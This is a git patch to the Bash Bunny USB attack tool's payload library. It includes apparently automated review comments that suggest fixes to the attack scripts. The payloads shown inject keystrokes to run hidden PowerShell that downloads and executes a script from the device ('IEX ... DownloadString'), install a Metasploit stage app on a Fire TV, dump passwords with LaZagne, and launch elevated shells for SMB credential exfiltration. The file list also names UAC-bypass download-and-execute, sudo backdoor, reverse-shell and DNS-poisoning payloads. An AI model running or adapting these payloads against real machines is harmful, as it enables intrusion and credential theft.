From 5a77792c1d2812e91305f177cf17e18780686e12 Mon Sep 17 00:00:00 2001 
From: Aidan Holland Date: Tue, 24 Oct 2017 20:10:17 -0400 Subject: [PATCH] Update and fix payloads (#277) * Updated all Payloads for Version 1.2+ Fixed Style Issues on extensions and payloads. Added GET TARGET_OS to get.sh Removed and Fixed all uses ducky_helper.sh (Issue #248) Removed all mention of DUCKY_LANG (Issue #248) Renamed Payloads with spaces in name Added an extension to keep Macs Happy Added a payload for Mac DNS poisoning Fixed Issue #271 changed wget to curl -o Implemented PR #268 Implemented PR #273 * Fixed e.cmd * Fix e.cmd pt2 * Fixed Issues Fixed issues pointed out by @sebkinne Fixed styling errors --- payloads/extensions/cucumber.sh | 40 +++++------ payloads/extensions/ducky_lang.sh | 4 +- payloads/extensions/get.sh | 44 +++++++----- payloads/extensions/mac_happy.sh | 26 +++++++ payloads/extensions/requiretool.sh | 10 +-- payloads/extensions/run.sh | 11 ++- payloads/extensions/setkb.sh | 60 ++++++++-------- .../Hidden_Images/payload.txt | 15 ++-- .../Link_File_analysis/payload.txt | 7 ++ .../readme.md | 0 .../run.ps1 | 0 payloads/library/android/fireytv/payload.txt | 12 ++-- .../credentials/BruteBunny/payload.txt | 13 ++-- .../library/credentials/DumpCreds/payload.txt | 58 +++++++-------- .../library/credentials/MrRobot/payload.txt | 5 +- .../library/credentials/PasswordGrabber/e.cmd | 2 +- .../credentials/PasswordGrabber/payload.txt | 5 +- .../SudoBackdoor/cleaner/payload.txt | 2 - .../SudoBackdoor/injector/payload.txt | 2 - .../credentials/WifiGrabber/payload.txt | 10 ++- .../execution/exe_UACBypassD&E/payload.txt | 14 ++-- .../psh.txt => psh_DownloadExec/p.txt} | 0 .../execution/psh_DownloadExec/payload.txt | 40 +++++------ .../execution/psh_DownloadExec/readme.md | 6 +- .../psh.txt => psh_DownloadExecSMB/p.txt} | 1 - .../execution/psh_DownloadExecSMB/payload.txt | 60 ++++++++-------- .../execution/psh_DownloadExecSMB/readme.md | 12 ++-- .../exfiltration/BlackBackup/payload.txt | 13 ++-- .../exfiltration/FileInfoExfil/payload.txt | 43 
+++++------ .../Powershell_TCP_Extractor/payload.txt | 12 ++-- .../exfiltration/ftp_exfiltrator/payload.txt | 11 ++- .../exfiltration/usb_exfiltrator/e.cmd | 13 +++- .../exfiltration/usb_exfiltrator/payload.txt | 4 +- .../general/ExecutableInstaller/payload.txt | 13 ++-- .../general/Proxy_Interceptor/payload.txt | 11 +-- .../p.ps1 | 0 .../payload.txt | 6 +- .../readme.md | 0 .../server.py | 0 .../phishing/dns_poisoning_mac/README.md | 9 +++ .../phishing/dns_poisoning_mac/payload.txt | 23 ++++++ payloads/library/prank/RickRoll/payload.txt | 71 ++++++++++--------- .../library/prank/macDesktop/macWallpaper.sh | 13 ++-- payloads/library/prank/win93/payload.txt | 1 - .../library/recon/InfoGrabber/payload.txt | 30 ++------ .../recon/Link File analysis/payload.txt | 12 ---- .../Link_File_analysis}/payload.txt | 13 ++-- .../readme.md | 0 .../run.ps1 | 0 .../library/recon/PrivEscChecker/payload.txt | 20 +++--- .../LinuxReverseShell/payload.txt | 3 + .../remote_access/NothingLess/payload.txt | 18 ++--- .../remote_access/USB_Intruder/payload.txt | 10 +-- .../Win_x64_JS_Rev_Meter/payload.txt | 1 - .../WindowsMeterpreterStaged/payload.txt | 13 ++-- .../sFTP Directory Grabber/payload.txt | 11 ++- 56 files changed, 438 insertions(+), 395 deletions(-) create mode 100644 payloads/extensions/mac_happy.sh create mode 100644 payloads/library/Incident_Response/Link_File_analysis/payload.txt rename payloads/library/Incident_Response/{Link File analysis => Link_File_analysis}/readme.md (100%) rename payloads/library/Incident_Response/{Link File analysis => Link_File_analysis}/run.ps1 (100%) rename payloads/library/execution/{psh_DownloadExecSMB/psh.txt => psh_DownloadExec/p.txt} (100%) mode change 100755 => 100644 rename payloads/library/execution/{psh_DownloadExec/psh.txt => psh_DownloadExecSMB/p.txt} (99%) mode change 100644 => 100755 rename payloads/library/general/{Windows NIC Sharing => Windows_NIC_Sharing}/p.ps1 (100%) rename payloads/library/general/{Windows NIC Sharing => 
Windows_NIC_Sharing}/payload.txt (92%) rename payloads/library/general/{Windows NIC Sharing => Windows_NIC_Sharing}/readme.md (100%) rename payloads/library/general/{Windows NIC Sharing => Windows_NIC_Sharing}/server.py (100%) create mode 100644 payloads/library/phishing/dns_poisoning_mac/README.md create mode 100644 payloads/library/phishing/dns_poisoning_mac/payload.txt delete mode 100644 payloads/library/recon/Link File analysis/payload.txt rename payloads/library/{Incident_Response/Link File analysis => recon/Link_File_analysis}/payload.txt (65%) rename payloads/library/recon/{Link File analysis => Link_File_analysis}/readme.md (100%) rename payloads/library/recon/{Link File analysis => Link_File_analysis}/run.ps1 (100%) diff --git a/payloads/extensions/cucumber.sh b/payloads/extensions/cucumber.sh index e4427744..dbb73b50 100644 --- a/payloads/extensions/cucumber.sh +++ b/payloads/extensions/cucumber.sh 
@@ -1,25 +1,25 @@ #!/bin/bash function CUCUMBER() { - case $1 in - "ENABLE") - echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null - echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null - ;; - "DISABLE") - echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null - sleep 2 - echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null - ;; - "PLAID") - echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null - sleep 2 - echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null - ;; - *) - LED FAIL - exit 1 - esac + case $1 in + "ENABLE") + echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null + echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null + ;; + "DISABLE") + echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null + sleep 2 + echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null + ;; + "PLAID") + echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null + sleep 2 + echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null + ;; + *) + LED FAIL + exit 1 + esac } -export -f CUCUMBER \ No newline at end of file +export -f CUCUMBER diff --git a/payloads/extensions/ducky_lang.sh b/payloads/extensions/ducky_lang.sh index 22b40eba..b95a9f6c 100755 --- a/payloads/extensions/ducky_lang.sh +++ b/payloads/extensions/ducky_lang.sh @@ -1,8 +1,8 @@ #!/bin/bash function DUCKY_LANG() { - [[ -z "$1" ]] && exit 1 # parameter must be set + [[ -z "$1" ]] && exit 1 # parameter must be set - export DUCKY_LANG="$1" + export DUCKY_LANG="$1" } export -f DUCKY_LANG diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh index 4788f584..2ef495f7 100755 --- a/payloads/extensions/get.sh +++ b/payloads/extensions/get.sh 
@@ -1,23 +1,31 @@ #!/bin/bash function GET() { - case $1 in - "TARGET_IP") - export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) - ;; - "TARGET_HOSTNAME") - export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//') - ;; - "HOST_IP") - export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'}) - ;; - "SWITCH_POSITION") - [[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return - [[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return - [[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return - export SWITCH_POSITION="invalid" - ;; - esac + case $1 in + "TARGET_IP") + export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) + ;; + "TARGET_HOSTNAME") + export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//') + ;; + "HOST_IP") + export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'}) + ;; + "SWITCH_POSITION") + [[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return + [[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return + [[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return + export SWITCH_POSITION="invalid" + ;; + "TARGET_OS") + ScanForOS=$(nmap -Pn -O $TARGET_IP -p1) + [[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP) + [[ $ScanForOS == *"Windows"* ]] && OSfound='WINDOWS' && return + [[ $ScanForOS == *"Linux"* ]] && OSfound='LINUX' && return + [[ $ScanForOS == *"Apple"* ]] && OSfound='MACOS' && return + export 
TARGET_OS='UNKNOWN' + ;; + esac } -export -f GET \ No newline at end of file +export -f GET diff --git a/payloads/extensions/mac_happy.sh b/payloads/extensions/mac_happy.sh new file mode 100644 index 00000000..2ceb581f --- /dev/null +++ b/payloads/extensions/mac_happy.sh @@ -0,0 +1,26 @@ +#!/bin/bash + +#Title: Mac_Happy +# Author: thehappydinoa +# Target: Mac +# Version: 0.1 +# +# Makes Mac happy by correctly setting pid and vid +# Use by running mac_happy ATTACKMODE HID +# + +function mac_happy() { + [[ -z "$1" ]] && exit 1 # parameter must be set + + [[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE + + for i in $*; + do + command=$(echo $command $i) + done + + command=$(echo $command VID_0X05AC PID_0X021E) + + eval $command +} +export -f mac_happy diff --git a/payloads/extensions/requiretool.sh b/payloads/extensions/requiretool.sh index 49d21e81..ed2f435a 100755 --- a/payloads/extensions/requiretool.sh +++ b/payloads/extensions/requiretool.sh @@ -8,11 +8,11 @@ # REQUIRETOOL impacket function REQUIRETOOL() { - [[ -z "$1" ]] && exit 1 # parameter must be set + [[ -z "$1" ]] && exit 1 # parameter must be set - if [ ! -d /tools/$1/ ]; then - LED FAIL - exit 1 - fi + if [ ! -d /tools/$1/ ]; then + LED FAIL + exit 1 + fi } export -f REQUIRETOOL diff --git a/payloads/extensions/run.sh b/payloads/extensions/run.sh index 37043db2..da1e16c1 100755 --- a/payloads/extensions/run.sh +++ b/payloads/extensions/run.sh @@ -13,9 +13,9 @@ function RUN() { local os=$1 shift - + [[ -z "$os" || -z "$*" ]] && exit 1 # Both OS and Command parameter must be set - + case "$os" in WIN) QUACK GUI r @@ -37,6 +37,13 @@ function RUN() { QUACK DELAY 500 QUACK ENTER ;; + LINUX) + QUACK ALT F2 + QUACK DELAY 500 + QUACK STRING "$@" + QUACK DELAY 500 + QUACK ENTER + ;; *) # OS parameter must be one of the above exit 1 diff --git a/payloads/extensions/setkb.sh b/payloads/extensions/setkb.sh index 463f79b8..9fd4b9e6 100644 --- a/payloads/extensions/setkb.sh 
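Review bot: In the new `TARGET_OS` arm the three match lines assign `OSfound`, which nothing reads or exports, while only the fall-through line exports `TARGET_OS`, so `GET TARGET_OS` always leaves `TARGET_OS` at `UNKNOWN`; each match line should be of the form `export TARGET_OS='WINDOWS' && return` to match what the other arms of this `case` do. The arm also runs nmap against an unquoted, unchecked `$TARGET_IP`, and the `TARGET_IP` arm above collects every lease address with `sort | uniq`, so the value can be empty or span several lines; a guard such as `[[ -z "$TARGET_IP" ]] && export TARGET_OS='UNKNOWN' && return` at the top of the arm, and `"$TARGET_IP"` quoted in both nmap calls, would make the failure mode explicit. Declaring `ScanForOS` with `local` keeps the scratch output out of the payload's exported environment.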
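Review bot: `eval $command` re-parses a string that was rebuilt from unquoted `$*` through `echo`, which discards the caller's quoting and word boundaries and is not needed here; the function can invoke its arguments directly with the two extra words appended, `"$@" VID_0X05AC PID_0X021E`, and drop the `for` loop and both `command=$(echo …)` lines. The guard `[[ ! $1 =~ "ATTACKMODE" ]]` only checks that the first word contains that substring; `[[ "$1" == "ATTACKMODE" ]] || exit 1` states the contract the header comment documents (`mac_happy ATTACKMODE HID`) exactly. The function is also the only extension in this commit named in lowercase and with an unspaced `#Title:` line, unlike `CUCUMBER`, `GET` and `REQUIRETOOL`, which is worth aligning if the upper-case names are a convention.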
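Review bot: The new `LINUX` arm carries no comment on what it assumes of the target: `ALT F2` only opens a run prompt on desktops that bind it that way, and on a bare console or a differently configured session the `QUACK STRING "$@"` text is typed into whatever has focus. A one-line comment above `QUACK ALT F2`, `# assumes a desktop that opens a run dialog on ALT+F2 (e.g. GNOME/KDE); verify per target`, plus a `LINUX` entry in the file's header list of accepted `os` values, would make the limitation visible to payload authors. The `*)` arm and the rest of `RUN` lie outside this hunk.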
+++ b/payloads/extensions/setkb.sh @@ -7,45 +7,45 @@ # Examples: # SETKB START (set the keyboard layout to a US keyboard layout) # SETKB DONE (set the keyboard layout to the default keyboard determined by the OS language settings) -# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts) +# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts) function SETKB() { - local state=$1 - shift - - [[ -z "$state" ]] && exit 1 # state keyboard parameter must be given. - - case "$state" in - 'START') - QUACK GUI r - QUACK DELAY 500 - QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;" - QUACK ENTER - QUACK DELAY 1500 + local state=$1 + shift - ;; - 'DONE') - QUACK GUI r - QUACK DELAY 500 - QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; " - QUACK ENTER - QUACK DELAY 1500 + [[ -z "$state" ]] && exit 1 # state keyboard parameter must be given. - ;; - - *) - QUACK GUI r - QUACK DELAY 500 - QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force" - QUACK ENTER - QUACK DELAY 1500 + case "$state" in + 'START') + QUACK GUI r + QUACK DELAY 500 + QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;" + QUACK ENTER + QUACK DELAY 1500 - ;; + ;; + 'DONE') + QUACK GUI r + QUACK DELAY 500 + QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; " + QUACK ENTER + QUACK DELAY 1500 + + ;; + + *) + QUACK GUI r + QUACK DELAY 500 + QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force" + QUACK ENTER + QUACK DELAY 1500 + + ;; - esac + esac } export -f SETKB 
diff --git a/payloads/library/Incident_Response/Hidden_Images/payload.txt b/payloads/library/Incident_Response/Hidden_Images/payload.txt index 2af8f84c..1dd42046 100644 --- a/payloads/library/Incident_Response/Hidden_Images/payload.txt +++ b/payloads/library/Incident_Response/Hidden_Images/payload.txt @@ -1,12 +1,7 @@ - - - -LED R B 100 +LED SETUP +GET SWITCH_POSITION ATTACKMODE HID STORAGE - -DUCKY_LANG gb -LED B -RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" -LED G FAST -#Green means good to go +LED SETUP +RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')" +LED ATTACK diff --git a/payloads/library/Incident_Response/Link_File_analysis/payload.txt b/payloads/library/Incident_Response/Link_File_analysis/payload.txt new file mode 100644 index 00000000..11e0d585 --- /dev/null +++ b/payloads/library/Incident_Response/Link_File_analysis/payload.txt @@ -0,0 +1,7 @@ +LED SETUP +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +LED SETUP +RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')" +LED ATTACk diff --git a/payloads/library/Incident_Response/Link File analysis/readme.md b/payloads/library/Incident_Response/Link_File_analysis/readme.md similarity index 100% rename from payloads/library/Incident_Response/Link File analysis/readme.md rename to payloads/library/Incident_Response/Link_File_analysis/readme.md diff --git a/payloads/library/Incident_Response/Link File analysis/run.ps1 b/payloads/library/Incident_Response/Link_File_analysis/run.ps1 similarity index 100% rename from payloads/library/Incident_Response/Link File analysis/run.ps1 rename to payloads/library/Incident_Response/Link_File_analysis/run.ps1 
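Review bot: The new Link_File_analysis payload ends with `LED ATTACk` (lower-case k) where every other payload in this commit, including the sibling Hidden_Images payload just above, uses `LED ATTACK`; if LED pattern names are matched case-sensitively this line will not select the intended pattern, so it should read `LED ATTACK`. The two near-identical Incident_Response payloads also order their setup differently, Hidden_Images issuing `GET SWITCH_POSITION` before `ATTACKMODE HID STORAGE` and this one after, and both emit `LED SETUP` twice with only the attackmode switch between the two calls; picking one order and a single `LED SETUP` keeps the pair in step.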
diff --git a/payloads/library/android/fireytv/payload.txt b/payloads/library/android/fireytv/payload.txt index fddf81f1..2c86ad6e 100644 --- a/payloads/library/android/fireytv/payload.txt +++ b/payloads/library/android/fireytv/payload.txt @@ -11,8 +11,13 @@ # Blue Blinking ...............Running ADB command to push payload.apk # Red Blinking.......FireTV failed to get an IP address from the Bash Bunny # Green..............Finished + +LED SETUP +GET TARGET_IP +GET SWITCH_POSITION + ATTACKMODE HID -LED R B 0 +LED ATTACK Q RIGHTARROW Q DELAY 200 Q RIGHTARROW @@ -64,12 +69,11 @@ Q DELAY 200 Q ESCAPE ATTACKMODE ECM_ETHERNET LED B 2000 -source bunny_helpers.sh if [ -z "${TARGET_IP}" ]; then - LED R 2000 + LED FAIL exit 1 fi adb connect ${TARGET_IP} adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" -LED G +LED FINISH diff --git a/payloads/library/credentials/BruteBunny/payload.txt b/payloads/library/credentials/BruteBunny/payload.txt index 12758b74..f91e0134 100644 --- a/payloads/library/credentials/BruteBunny/payload.txt +++ b/payloads/library/credentials/BruteBunny/payload.txt @@ -5,15 +5,14 @@ # Version: 1.0 # Category: Password Recovery # Target: Windows XP SP3+ -# +# # Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain # access to the admin panel. # init -LED R B +LED SETUP -# need SWITCH_POSITION, so give it to me. please. thank you. -source bunny_helpers.sh +GET SWITCH_POSITION # set up the things to make it do stuff mkdir -p /root/udisk/BruteBunny/loot 
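Review bot: `GET TARGET_IP` is now issued at the top of the script, before `ATTACKMODE HID`, but the `TARGET_IP` lookup in get.sh (also in this commit) reads `/var/lib/dhcp/dhcpd.leases`, which presumably only holds the Fire TV's lease once `ATTACKMODE ECM_ETHERNET` has been active later in the script; at this point it is empty or holds a lease from an earlier session. The second hunk removes `source bunny_helpers.sh` from exactly the spot where the value used to be refreshed, so the `[ -z "${TARGET_IP}" ]` check and `adb connect ${TARGET_IP}` now operate on a stale value. Moving `GET TARGET_IP` to just after `LED B 2000`, where the `source` line was, keeps the original ordering.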
@@ -28,12 +27,12 @@ sync;sleep 1;sync ATTACKMODE HID STORAGE # wait for storage -LED R G B 100 +LED STAGE1 QUACK DELAY 6000 QUACK GUI r QUACK DELAY 100 # unleash the brute bunny -LED B 100 +LED STAGE2 QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')" QUACK ENTER sleep 10 @@ -41,4 +40,4 @@ sleep 10 # sync the stuff sync;sleep 1;sync -LED G \ No newline at end of file +LED FINISH diff --git a/payloads/library/credentials/DumpCreds/payload.txt b/payloads/library/credentials/DumpCreds/payload.txt index fb219643..38f59e59 100644 --- a/payloads/library/credentials/DumpCreds/payload.txt +++ b/payloads/library/credentials/DumpCreds/payload.txt 
@@ -6,23 +6,23 @@ # Build: 1004 # Category: Exfiltration # Target: Windows Windows 10 (Powershell) -# Attackmodes: HID, Ethernet +# Attackmodes: HID, Ethernet # !!! works only with Bash Bunny FW 1.1 and up !!! -# -# -# LED Status -# ----------------------- + -------------------------------------------- -# SETUP + Setup +# +# +# LED Status +# ----------------------- + -------------------------------------------- +# SETUP + Setup # FAIL + No /tools/impacket/examples/smbserver.py found -# FAIL2 + Target did not acquire IP address -# Yellow single blink + Initialization -# Yellow double blink + HID Stage -# Yellow triple blink + Wait for IP coming up -# Cyan inv single blink + Wait for Handshake (SMBServer Coming up) -# Cyan inv quint blink + Powershell scripts running -# White fast blink + Cleanup, copy Files to /loot -# Green + Finished -# ----------------------- + -------------------------------------------- +# FAIL2 + Target did not acquire IP address +# Yellow single blink + Initialization +# Yellow double blink + HID Stage +# Yellow triple blink + Wait for IP coming up +# Cyan inv single blink + Wait for Handshake (SMBServer Coming up) +# Cyan inv quint blink + Powershell scripts running +# White fast blink + Cleanup, copy Files to /loot +# Green + Finished +# ----------------------- + -------------------------------------------- logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################" @@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 # ###### Lets Start #### LED SETUP +GET SWITCH_POSITION # Some Variables SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION @@ -39,13 +40,13 @@ LOOTDIR=$SWITCHDIR/loot if [ -f $SWITCHDIR/DEBUG ];then DEBUG=1 # 1= Debug on / 0= Debug off tail -f /var/log/syslog > /tmp/log.txt & -else +else DEBUG=0 fi -mkdir -p $LOOTDIR +mkdir -p $LOOTDIR -REQUIRETOOL impacket +REQUIRETOOL impacket # remove old Handshake Files rm -f $SWITCHDIR/CON_* 
@@ -60,8 +61,8 @@ Q DELAY 5000 # Launch initial cmd if [ $DEBUG -eq 1 ]; then - RUN WIN cmd -else + RUN WIN cmd +else RUN WIN cmd /k mode con lines=1 cols=100 fi @@ -69,7 +70,7 @@ fi Q DELAY 1000 if [ $DEBUG -eq 1 ]; then Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs" -else +else Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs" fi Q DELAY 500 @@ -77,12 +78,12 @@ Q ENTER # Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel) - -# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline -# now the second powershell command goes to the admin cmd windows. -# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt. -# the second powershell command goes to the cmd Windows I open first. +# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline +# now the second powershell command goes to the admin cmd windows. + +# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt. +# the second powershell command goes to the cmd Windows I open first. Q DELAY 1000 Q ALT j Q DELAY 500 @@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###" # Ethernet Tage LED STAGE3 ATTACKMODE RNDIS_ETHERNET -# Source bunny_helpers.sh to get environment variables logger -t DumpCred_2.1 "### Start SMBServer ###" # Start SMB Server 
@@ -149,7 +149,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###" if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then mkdir -p /root/udisk/loot/DumpCred_2.1 fi -mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1 +mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1 rmdir $LOOTDIR rm -f $SWITCHDIR/CON_EOF @@ -163,4 +163,4 @@ fi ATTACKMODE RNDIS_ETHERNET STORAGE sync; sleep 1; sync -LED FINISH \ No newline at end of file +LED FINISH diff --git a/payloads/library/credentials/MrRobot/payload.txt b/payloads/library/credentials/MrRobot/payload.txt index 5778984b..ec0430d9 100644 --- a/payloads/library/credentials/MrRobot/payload.txt +++ b/payloads/library/credentials/MrRobot/payload.txt @@ -14,7 +14,10 @@ # Cyan inverted double blink..Starts server to gets results # Green..............Got Creds and copied to loot folder # Red................No Creds + LED SETUP +GET SWITCH_POSITION + # Creating Loot Folders LOOTDIR=/root/udisk/loot/MrRobot mkdir -p $LOOTDIR @@ -34,7 +37,7 @@ Q DELAY 500 Q ENTER Q DELAY 1500 -LED STAGE2 +LED STAGE2 #Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\"" Q DELAY 300 diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd index bcde067b..5dbc35bd 100644 --- a/payloads/library/credentials/PasswordGrabber/e.cmd +++ b/payloads/library/credentials/PasswordGrabber/e.cmd 
@@ -11,7 +11,7 @@ REM This executes LaZagne in the current directory and outputs the password file REM Time and Date is also added setlocal cd /d %~dp0 -%~dp0\laZagne.exe all > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" +%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 78f52a56..4cc20386 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt @@ -6,12 +6,13 @@ # Target: Windows XP SP3+ # Props: Diggster, IMcPwn # Category: Exfiltration -# +# # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs # which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny. # - +LED SETUP +GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" diff --git a/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt b/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt index 09d63870..f93cf3db 100644 --- a/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt +++ b/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt @@ -24,8 +24,6 @@ else ATTACKMODE ECM_ETHERNET HID fi -DUCKY_LANG us - GET SWITCH_POSITION GET HOST_IP 
diff --git a/payloads/library/credentials/SudoBackdoor/injector/payload.txt b/payloads/library/credentials/SudoBackdoor/injector/payload.txt index 8220fe05..7d259a07 100644 --- a/payloads/library/credentials/SudoBackdoor/injector/payload.txt +++ b/payloads/library/credentials/SudoBackdoor/injector/payload.txt @@ -26,8 +26,6 @@ else ATTACKMODE ECM_ETHERNET HID fi -DUCKY_LANG us - GET SWITCH_POSITION GET HOST_IP diff --git a/payloads/library/credentials/WifiGrabber/payload.txt b/payloads/library/credentials/WifiGrabber/payload.txt index e5e9158a..3c786aff 100755 --- a/payloads/library/credentials/WifiGrabber/payload.txt +++ b/payloads/library/credentials/WifiGrabber/payload.txt @@ -22,17 +22,15 @@ ATTACKMODE HID STORAGE -LED R B 200 +LED SETUP -LANGUAGE=‘us’ - -source bunny_helpers.sh +GET SWITCH_POSITION if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then QUACK ${SWITCH_POSITION}/ducky_script.txt - LED G + LED FINISH else - LED R + LED FAIL echo "Unable to load ducky_script.txt" >> /root/debuglog.txt exit 1 fi diff --git a/payloads/library/execution/exe_UACBypassD&E/payload.txt b/payloads/library/execution/exe_UACBypassD&E/payload.txt index 8631db27..0362017d 100644 --- a/payloads/library/execution/exe_UACBypassD&E/payload.txt +++ b/payloads/library/execution/exe_UACBypassD&E/payload.txt 
@@ -2,21 +2,24 @@ # Author: Skiddie # Version: 1.1 # Target: Windows -# +# # Download and executes any binary executable with administrator privileges WITHOUT # prompting the user for administrator rights (aka UAC bypass/exploit) -# Please define URL and SAVEFILENAME in the a.vbs script +# Please define URL and SAVEFILENAME in the a.vbs script # Target does need internet connection # Works on Windows 7 - Windows 10 -# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges -# However from what i am aware version 7,8 and 8.1 are still effected +# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges +# However from what i am aware version 7,8 and 8.1 are still effected # Currently fastest download and execute for HID attacks to date. (with UAC bypass) #Define your bunny storage stick name DRIVER_LABEL='BashBunny' #RED means starting -LED R +LED SETUP + +#Gets File locations +GET SWITCH_POSITION #We are a keyboard ATTACKMODE HID 